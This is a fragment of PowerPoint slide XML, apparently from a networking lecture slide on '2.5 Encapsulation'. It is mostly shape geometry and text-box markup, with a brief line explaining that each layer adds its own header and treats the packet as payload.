                  <a:lnTo>
                    <a:pt x="3250993" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="730D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5" name="object 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D82459-6E50-AD35-FCCE-EA7FC678BFC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4740401" y="3897630"/>
              <a:ext cx="3289300" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3289300" h="774700">
                  <a:moveTo>
                    <a:pt x="0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3250993" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3288792" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3278649" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3250993" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209978" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3159759" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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8" name="object 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6709664-CD85-D438-C088-431536EE4BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4941291" y="4073704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51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{690C73B2-1958-BAA3-2EC4-D7AFDBB28916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225647" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="object 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{985ECAB3-7E71-244D-9D23-CB6A90E3D000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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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3" name="object 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F742B1CF-C0E1-1E78-9B8F-B056B746C7CC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0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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0" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8C53530-3863-933C-D458-DD6A1A5D031D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449803" y="1364617"/>
            <a:ext cx="85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55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F8CE40-7DD7-DD40-7901-1E538B7D6448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1609142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56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DAD741D-7E3F-CEC9-F002-49530EC416FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F41F9471-D9A4-7C69-1741-5D3EE4133F75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429483" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6473708-782B-83D2-7A42-BEE0DE85C98F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8122260" y="1290627"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360170"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{623471DF-9FC0-AF05-5212-BAA4023D3F18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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1" name="object 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E02A08-C96E-224E-D60C-93C257B0EEB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564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5" name="object 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75BE1502-5FB0-C7FF-2070-F3B7384B1304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD7AEEFE-E4D7-341C-2001-0F1702CE76FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4766534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37" name="object 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70394CF6-DDB8-A6F2-0053-A2E7C618C732}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4777180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47</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4333F24-050F-81C5-3B45-94E05D70339F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="3929839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63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D3CF3AA-BEE2-2488-E82E-989F3617DF0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="4173679"/>
            <a:ext cx="106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2335B8-F048-4AFE-F0E4-2B071F95090F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2600280" y="2814480"/>
              <a:ext cx="2843640" cy="159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2335B8-F048-4AFE-F0E4-2B071F9509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920" y="2805120"/>
                <a:ext cx="2862360" cy="16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7350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39E32B0-F49F-6041-B6ED-CF2E22819887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747C113-AE37-9742-13E6-62ED91C63F5B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5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Encapsulation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E77431D-6851-B413-D8A1-073A2DA007BF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CF66169-ED85-D512-5E66-26BDCAD0149B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48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B07C272-B733-EEC9-E0D5-D32B95919636}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1995920"/>
            <a:ext cx="805624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During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encapsulation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every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adds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own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header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to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packet,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treating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payload.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This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happens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every</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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sent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host.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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181CA7-9A31-F330-BFBF-050A21E2050E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2676600" y="2328840"/>
              <a:ext cx="5386680" cy="141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181CA7-9A31-F330-BFBF-050A21E205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240" y="2319480"/>
                <a:ext cx="5405400" cy="143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644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708666C-732D-6BA2-235D-AA99AB8778B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432428" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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38DFFA41-25C2-760F-3175-B75929ECC255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2945D46E-8B57-BFFC-82A8-1B576829D916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1" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E6D9B38-6FB9-2E3F-A419-6F6EB82C1532}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="540258" y="1166621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B803B2B2-3842-ED97-BF76-8F66D957B9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="1181102"/>
            <a:ext cx="20078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11B2E3B9-0FEA-84AC-DA3B-8E3B149B5853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D659C7-7B5E-D613-A403-28BAEF1BC5A4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50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00763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9" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC0BF0EB-F69E-F058-DAF1-3331FD565730}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="540258" y="20794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50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8" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4C97ABF-402A-382E-CD88-5B457FFD90DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C80C17C5-2C55-3C12-54FE-347964A89BAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032EE8B8-5EC8-B641-E31A-D4B336AC86D9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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722404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35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6927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7" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C3EA1E4-F85E-CEA1-3EB2-4E7A9FCC55C6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="540258" y="2993898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7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92935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404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808412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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722404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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E66F8FB-C8C0-483C-35D5-D368BF674CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C419A87A-CEB4-74B5-027C-72C68568D8E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDFBFE7A-1274-C0FF-D9D5-27A88D9B0013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2407666" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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6928" y="722399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135890" y="815339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2407666" y="815339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543556" y="679449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543556" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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5" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA52CFC-91E5-0F35-DFE6-BB1BF29D44A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="540258" y="3906774"/>
              <a:ext cx="2543810" cy="815340"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2543810" h="815339">
                  <a:moveTo>
                    <a:pt x="0" y="135889"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135890" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2407666" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543556" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2543556" y="679449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2407666" y="815339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135890" y="815339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{555F3E37-4EC1-9F50-90C0-8A03E38E2AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE29C7C-4FB6-CACD-B668-74CA24F0E72A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264217" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24A7B309-189A-11E9-178A-5DDFEFEE4F0D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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
